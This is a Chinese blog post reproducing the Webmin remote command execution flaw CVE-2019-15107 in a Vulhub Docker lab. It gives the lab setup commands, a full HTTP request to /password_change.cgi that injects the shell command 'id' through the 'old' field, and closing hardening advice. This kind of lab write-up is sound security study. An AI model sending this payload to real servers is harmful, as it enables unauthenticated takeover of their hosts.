漏洞复现——Webmin 远程命令执行(CVE-2019-15107)

漏洞编号:

CVE-2019-15107

漏洞描述:

Webmin是一款基于Web的远程管理工具,该工具存在一个远程命令执行漏洞(CVE-2019-15107)。攻击者可以通过特制的请求,未经身份验证的情况下执行任意命令,并可能导致服务器被完全控制。

影响版本:

Webmin版本:1.920及之前的版本

利用方法(利用案例):
cd ~/vulhub/webmin/CVE-2019-15107    //到家目录下的路径
ls
cat docker-compose.yml      //看端口是否一致
sudo docker-compose up -d  	//拉取环境
sudo docker ps -a 	        //检查是否启用成功

image-20231012200447597

image-20231012200720688

image-20231012205356528

POST /password_change.cgi HTTP/1.1
Host: 192.168.5.141:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://192.168.5.141:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
​
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
附带文件:

此漏洞报告无附带文件。

加固建议:
  • 尽快更新Webmin版本至1.930或更高版本,以修复该漏洞。

  • 如果无法立即更新Webmin,可以采取以下措施之一:

    • 禁用或限制Webmin的远程访问,仅允许访问来自受信任的IP地址。

    • 使用防火墙规则,限制对Webmin的访问仅来自内部网络。

    • 配置Web服务器强制使用HTTPS加密连接,并使用安全证书。

参考信息:

Vulhub - Docker-Compose file for vulnerability environment

漏洞分类:

远程命令执行/高危

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值